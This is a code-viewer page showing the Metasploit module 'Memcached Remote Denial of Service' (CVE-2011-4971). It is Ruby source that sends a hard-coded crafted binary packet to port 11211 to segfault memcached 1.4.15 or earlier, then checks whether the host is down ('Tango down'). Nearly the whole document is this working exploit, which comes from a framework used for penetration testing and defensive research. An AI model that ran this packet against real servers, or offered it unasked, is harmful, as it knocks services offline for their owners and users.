Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/misc/memcached.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Memcached Remote Denial of Service',

15
        'Description' => %q{

16
          This module sends a specially-crafted packet to cause a

17
          segmentation fault in memcached v1.4.15 or earlier versions.

18
        },

19
        'References' => [

20
          [ 'URL', 'https://code.google.com/archive/p/memcached/issues/192' ],

21
          [ 'CVE', '2011-4971' ],

22
          [ 'OSVDB', '92867' ]

23
        ],

24
        'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],

25
        'License' => MSF_LICENSE,

26
        'Notes' => {

27
          'Stability' => [CRASH_SERVICE_DOWN],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33


34
    register_options([Opt::RPORT(11211),])

35
  end

36


37
  def is_alive?

38
    connect

39
    disconnect

40
    true

41
  rescue Rex::ConnectionRefused

42
    return false

43
  end

44


45
  def run

46
    connect

47
    pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"

48
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"

49
    pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

50
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

51


52
    print_status("#{rhost}:#{rport} - Sending dos packet...")

53
    sock.put(pkt)

54
    disconnect

55


56
    print_status("#{rhost}:#{rport} - Checking host status...")

57
    select(nil, nil, nil, 1)

58


59
    if is_alive?

60
      print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")

61
    else

62
      print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?

63
    end

64
  end

65
end

66


67